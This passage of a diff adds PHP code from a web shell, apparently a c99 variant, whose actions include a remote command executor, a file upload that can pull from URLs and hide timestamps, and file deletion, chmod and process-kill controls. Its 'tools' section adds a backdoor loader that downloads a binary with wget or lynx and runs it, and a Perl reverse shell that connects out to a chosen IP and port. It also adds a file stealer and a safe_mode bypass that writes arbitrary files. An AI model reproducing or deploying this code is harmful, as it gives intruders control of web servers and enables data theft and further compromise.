+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} 
+   else {$err = "Can't chmod to ".$octet.".";} 
+  } 
+  if ($form) 
+  { 
+   $perms = parse_perms($mode); 
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; 
+  } 
+ } 
+} 
+if ($act == "upload") 
+{ 
+ $uploadmess = ""; 
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); 
+ if (empty($uploadpath)) {$uploadpath = $d;} 
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} 
+ if (!empty($submit)) 
+ { 
+  global $HTTP_POST_FILES; 
+  $uploadfile = $HTTP_POST_FILES["uploadfile"]; 
+  if (!empty($uploadfile["tmp_name"])) 
+  { 
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];} 
+   else {$destin = $userfilename;} 
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";} 
+  } 
+  elseif (!empty($uploadurl)) 
+  { 
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;} 
+   else 
+   { 
+    $destin = explode("/",$destin); 
+    $destin = $destin[count($destin)-1]; 
+    if (empty($destin)) 
+    { 
+     $i = 0; 
+     $b = ""; 
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} 
+   } 
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} 
+   else 
+   { 
+    $st = getmicrotime(); 
+    $content = @file_get_contents($uploadurl); 
+    $dt = round(getmicrotime()-$st,4); 
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";} 
+    else 
+    { 
+     if ($filestealth) {$stat = stat($uploadpath.$destin);} 
+     $fp = fopen($uploadpath.$destin,"w"); 
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} 
+     else 
+     { 
+      fwrite($fp,$content,strlen($content)); 
+      fclose($fp); 
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} 
+     } 
+    } 
+   } 
+  } 
+ } 
+ if ($miniform) 
+ { 
+  echo "<b>".$uploadmess."</b>"; 
+  $act = "ls"; 
+ } 
+ else 
+ { 
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST> 
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br> 
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> 
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> 
+File-name (auto-fill): <input name=uploadfilename size=25><br><br> 
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br> 
+<input type=submit name=submit value=\"Upload\"> 
+</form>"; 
+ } 
+} 
+if ($act == "delete") 
+{ 
+ $delerr = ""; 
+ foreach ($actbox as $v) 
+ { 
+  $result = FALSE; 
+  $result = fs_rmobj($v); 
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} 
+ } 
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} 
+ $act = "ls"; 
+} 
+if (!$usefsbuff) 
+{ 
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} 
+} 
+else 
+{ 
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } 
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} 
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} 
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} 
+ elseif ($actpastebuff) 
+ { 
+  $psterr = ""; 
+  foreach($sess_data["copy"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} 
+   if ($copy_unset) {unset($sess_data["copy"][$k]);} 
+  } 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} 
+  $act = "ls"; 
+ } 
+ elseif ($actarcbuff) 
+ { 
+  $arcerr = ""; 
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} 
+  else {$ext = ".tar.gz";} 
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} 
+  $cmdline .= " ".$actarcbuff_path; 
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]); 
+  foreach($objects as $v) 
+  { 
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); 
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} 
+   if (is_dir($v)) 
+   { 
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} 
+    $v .= "*"; 
+   } 
+   $cmdline .= " ".$v; 
+  } 
+  $tmp = realpath("."); 
+  chdir($d); 
+  $ret = myshellexec($cmdline); 
+  chdir($tmp); 
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} 
+  $ret = str_replace("\r\n","\n",$ret); 
+  $ret = explode("\n",$ret); 
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   if (in_array($v,$ret)) {fs_rmobj($v);} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} 
+  $act = "ls"; 
+ } 
+ elseif ($actpastebuff) 
+ { 
+  $psterr = ""; 
+  foreach($sess_data["copy"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} 
+   if ($copy_unset) {unset($sess_data["copy"][$k]);} 
+  } 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} 
+  $act = "ls"; 
+ } 
+} 
+if ($act == "cmd") 
+{ 
+if (trim($cmd) == "ps -aux") {$act = "processes";} 
+elseif (trim($cmd) == "tasklist") {$act = "processes";} 
+else 
+{ 
+ @chdir($chdir); 
+ if (!empty($submit)) 
+ { 
+  echo "<b>Result of execution this command</b>:<br>"; 
+  $olddir = realpath("."); 
+  @chdir($d); 
+  $ret = myshellexec($cmd); 
+  $ret = convert_cyr_string($ret,"d","w"); 
+  if ($cmd_txt) 
+  { 
+   $rows = count(explode("\r\n",$ret))+1; 
+   if ($rows < 10) {$rows = 10;} 
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; 
+  } 
+  else {echo $ret."<br>";} 
+  @chdir($olddir); 
+ } 
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} 
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; 
+} 
+} 
+if ($act == "ls") 
+{ 
+ if (count($ls_arr) > 0) {$list = $ls_arr;} 
+ else 
+ { 
+  $list = array(); 
+  if ($h = @opendir($d)) 
+  { 
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} 
+   closedir($h); 
+  } 
+  else {} 
+ } 
+ if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";} 
+ else 
+ { 
+  //Building array 
+  $objects = array(); 
+  $vd = "f"; //Viewing mode 
+  if ($vd == "f") 
+  { 
+   $objects["head"] = array(); 
+   $objects["folders"] = array(); 
+   $objects["links"] = array(); 
+   $objects["files"] = array(); 
+   foreach ($list as $v) 
+   { 
+    $o = basename($v); 
+    $row = array(); 
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} 
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} 
+    elseif (is_dir($v)) 
+    { 
+     if (is_link($v)) {$type = "LINK";} 
+     else {$type = "DIR";} 
+     $row[] = $v; 
+     $row[] = $type; 
+    } 
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} 
+    $row[] = filemtime($v); 
+    if (!$win) 
+    { 
+     $ow = posix_getpwuid(fileowner($v)); 
+     $gr = posix_getgrgid(filegroup($v)); 
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); 
+    } 
+    $row[] = fileperms($v); 
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} 
+    elseif (is_link($v)) {$objects["links"][] = $row;} 
+    elseif (is_dir($v)) {$objects["folders"][] = $row;} 
+    elseif (is_file($v)) {$objects["files"][] = $row;} 
+    $i++; 
+   } 
+   $row = array(); 
+   $row[] = "<b>Name</b>"; 
+   $row[] = "<b>Size</b>"; 
+   $row[] = "<b>Modify</b>"; 
+   if (!$win) 
+  {$row[] = "<b>Owner/Group</b>";} 
+   $row[] = "<b>Perms</b>"; 
+   $row[] = "<b>Action</b>"; 
+   $parsesort = parsesort($sort); 
+   $sort = $parsesort[0].$parsesort[1]; 
+   $k = $parsesort[0]; 
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";} 
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; 
+   $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>"; 
+   $row[$k] .= $y; 
+   for($i=0;$i<count($row)-1;$i++) 
+   { 
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} 
+   } 
+   $v = $parsesort[0]; 
+   usort($objects["folders"], "tabsort"); 
+   usort($objects["links"], "tabsort"); 
+   usort($objects["files"], "tabsort"); 
+   if ($parsesort[1] == "d") 
+   { 
+    $objects["folders"] = array_reverse($objects["folders"]); 
+    $objects["files"] = array_reverse($objects["files"]); 
+   } 
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); 
+   $tab = array(); 
+   $tab["cols"] = array($row); 
+   $tab["head"] = array(); 
+   $tab["folders"] = array(); 
+   $tab["links"] = array(); 
+   $tab["files"] = array(); 
+   $i = 0; 
+   foreach ($objects as $a) 
+   { 
+    $v = $a[0]; 
+    $o = basename($v); 
+    $dir = dirname($v); 
+    if ($disp_fullpath) {$disppath = $v;} 
+    else {$disppath = $o;} 
+    $disppath = str2mini($disppath,60); 
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} 
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} 
+    foreach ($regxp_highlight as $r) 
+    { 
+     if (ereg($r[0],$o)) 
+     { 
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} 
+      else 
+      { 
+       $r[1] = round($r[1]); 
+       $isdir = is_dir($v); 
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) 
+       { 
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} 
+        $disppath = $r[2].$disppath.$r[3]; 
+        if ($r[4]) {break;} 
+       } 
+      } 
+     } 
+    } 
+    $uo = urlencode($o); 
+    $ud = urlencode($dir); 
+    $uv = urlencode($v); 
+    $row = array(); 
+    if ($o == ".") 
+    { 
+     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; 
+     $row[] = "LINK"; 
+    } 
+    elseif ($o == "..") 
+    { 
+     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; 
+     $row[] = "LINK"; 
+    } 
+    elseif (is_dir($v)) 
+    { 
+     if (is_link($v)) 
+     { 
+      $disppath .= " => ".readlink($v); 
+      $type = "LINK"; 
+      $row[] =  "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; 
+     } 
+     else 
+     { 
+      $type = "DIR"; 
+      $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; 
+      } 
+     $row[] = $type; 
+    } 
+    elseif(is_file($v)) 
+    { 
+     $ext = explode(".",$o); 
+     $c = count($ext)-1; 
+     $ext = $ext[$c]; 
+     $ext = strtolower($ext); 
+     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; 
+     $row[] = view_size($a[1]); 
+    } 
+    $row[] = date("d.m.Y H:i:s",$a[2]); 
+    if (!$win) {$row[] = $a[3];} 
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; 
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} 
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} 
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;} 
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;} 
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} 
+    elseif (is_link($v)) {$tab["links"][] = $row;} 
+    elseif (is_dir($v)) {$tab["folders"][] = $row;} 
+    elseif (is_file($v)) {$tab["files"][] = $row;} 
+    $i++; 
+   } 
+  } 
+  // Compiling table 
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); 
+  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgcolor=#000000 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; 
+  foreach($table as $row) 
+  { 
+   echo "<tr>\r\n"; 
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";} 
+   echo "</tr>\r\n"; 
+  } 
+  echo "</table><hr size=\"1\" noshade><p align=\"right\"> 
+  <script> 
+  function ls_setcheckboxall(status) 
+  { 
+   var id = 1; 
+   var num = ".(count($table)-2)."; 
+   while (id <= num) 
+   { 
+    document.getElementById('actbox'+id).checked = status; 
+    id++; 
+   } 
+  } 
+  function ls_reverse_all() 
+  { 
+   var id = 1; 
+   var num = ".(count($table)-2)."; 
+   while (id <= num) 
+   { 
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; 
+    id++; 
+   } 
+  } 
+  </script> 
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">  
+  <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">"; 
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) 
+  { 
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; 
+  } 
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>"; 
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; 
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; 
+  if ($usefsbuff) 
+  { 
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>"; 
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; 
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; 
+  } 
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>"; 
+  echo "</form>"; 
+ } 
+} 
+if ($act == "tools") 
+{ 
+
+
+
+
+
+
+ ?> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Bind Functions By r57  </b></a> ::</b></p></td></tr>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center">
+    </div>
+ <form action="<?php echo $surl; ?>">
+<b>Bind With Backd00r Burner</b></br><form action="<?php echo $surl;?>"><input type=hidden name=act value=tools><select size=\"1\" name=dolma><option value="wgetcan">Use Wget</option><option value="lynxcan">Use lynx -dump</option><option value="freadcan">Use Fread</option></select></br></br><input type="submit" value="Burn it bAby"></form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+  
+ 
+   <b>Back-Connection :</b></br><form action="<?php echo $surl;?>"> <b>Ip (default is your ip) :</br> </b><input type=hidden name=act value=tools><input type="text" name="ipi" value="<?echo getenv('REMOTE_ADDR');?>"></br><b>Port:</br></b><input type="text" name="pipi" value="4392"></br><input type="submit" value="C0nnect ->"></br></form>
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
+   
+   </center>
+    </td>
+</tr></TABLE>
+ 
+ 
+ 
+ 
+ 
+
+
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>File Stealer Function Ripped fRom Tontonq 's File Stealer ... </b></a> ::</b></p></td></tr>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><b>Safe_Mode Bypass</b>
+    <form action="<?php echo $surl; ?>" method="POST">
+    <input type=hidden name=act value=tools>
+    <textarea name="erorr" cols=100 rows=10></textarea></br>
+    <input type="text" name="nere" value="<?echo "$real\index.php";?> "size=84>
+    <input type="submit" value="Write 2 File !!">
+    
+    </form>
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    </div>
+ 
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+   <form action="<?php echo $surl; ?>" method="POST">
+   <input type=hidden name=act value=tools>
+   Dosyanin Adresi ? = <input type="text" name="dosyaa" size="81" maxlength=500  value=""><br><br> 
+Nereya Kaydolcak? = <input type="text" name="yeniyer" size=81 maxlength=191 value="<?php echo "$real/sploitz.zip"; ?>"><br><br> 
+<input type=submit class='stealthSubmit' Value='Dosyayi Chek'> 
+</form>
+<br><br><br>
+   
+   
+   
+   
+   </center>
+   
+   </center>
+    </td>
+</tr></TABLE>
+
+
+
+
+
+
+
+
+
+
+
+
+<?php 
+
+if (isset($_POST['dosyaa']))
+{
+dosyayicek($_POST['dosyaa'],$_POST['yeniyer']);
+
+}
+if (!empty($_GET['ipi']) && !empty($_GET['pipi'])) 
+{ 
+ cf("/tmp/back",$back_connect); 
+ $p2=which("perl"); 
+ $blah = ex($p2." /tmp/back ".$_GET['ipi']." ".$_GET['pipi']." &"); 
+echo"<b>Now script try connect to ".$_GET['ipi']." port ".$_GET['pipi']." ...</b>"; 
+} 
+if (!empty($_GET['dolma'])) 
+{  
+$sayko=htmlspecialchars($_GET['dolma']); 
+if ($sayko == "wgetcan") 
+{ 
+
+myshellexec("wget $adires -O sayko_bind;chmod 777 sayko_bind;./sayko_bind"); 
+
+
+} 
+
+else if ($sayko =="freadcan") 
+{ 
+dosyayicek($adires,"sayko_bind");
+myshellexec("./sayko_bind");
+} 
+
+else if ($sayko == "lynxcan") 
+{ 
+myshellexec("lynx -dump $adires > sayko_bind;chmod 777 sayko_bind;./sayko_bind"); 
+
+} 
+
+
+
+
+
+} 
+
+if  (!empty($_POST['erorr'])) 
+{
+
+
+
+error_log($_POST['erorr'], 3, "php://".$_POST['nere']);
+
+
+
+}
+
+
+
+
+
+
+
+
+
+} 
+if ($act == "processes") 
+{ 
+ echo "<b>Processes:</b><br>"; 
+ if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} 
+ else {$handler = "tasklist";} 
+ $ret = myshellexec($handler); 
+ if (!$ret) {echo "Can't execute \"".$handler."\"!";} 
+ else 
+ { 
+  if (empty($processes_sort)) {$processes_sort = $sort_default;} 
+  $parsesort = parsesort($processes_sort); 
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} 
+  $k = $parsesort[0]; 
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+  $ret = htmlspecialchars($ret); 
+  if (!$win) 
+  { 
+   if ($pid) 
+   { 
+    if (is_null($sig)) {$sig = 9;} 
+    echo "Sending signal ".$sig." to #".$pid."... "; 
+    if (posix_kill($pid,$sig)) {echo "OK.";} 
+    else {echo "ERROR.";} 
+   } 
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);} 
+   $stack = explode("\n",$ret); 
+   $head = explode(" ",$stack[0]); 
+   unset($stack[0]); 
+   for($i=0;$i<count($head);$i++) 
+   { 
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";} 
+   } 
+   $prcs = array(); 
+   foreach ($stack as $line) 
+   { 
+    if (!empty($line)) 
+{ 
+ echo "<tr>"; 
+     $line = explode(" ",$line); 
+     $line[10] = join(" ",array_slice($line,10)); 
+     $line = array_slice($line,0,11); 
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} 
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; 
+     $prcs[] = $line; 
+     echo "</tr>"; 
+    } 
+   } 
+  } 
+  else 
+  { 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);} 
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} 
+   $ret = convert_cyr_string($ret,"d","w"); 
+   $stack = explode("\n",$ret); 
+   unset($stack[0],$stack[2]); 
+   $stack = array_values($stack); 
+   $head = explode("",$stack[0]); 
+   $head[1] = explode(" ",$head[1]); 
+   $head[1] = $head[1][0]; 
+   $stack = array_slice($stack,1); 
+   unset($head[2]); 
+   $head = array_values($head); 
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+   if ($k > count($head)) {$k = count($head)-1;} 
+   for($i=0;$i<count($head);$i++) 
+   { 
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";} 
+   } 
+   $prcs = array(); 
+   foreach ($stack as $line) 
+   { 
+    if (!empty($line)) 
+    { 
+     echo "<tr>"; 
+     $line = explode("",$line); 
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); 
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024;  
+     $prcs[] = $line; 
+     echo "</tr>"; 
+    } 
+   } 
+  } 
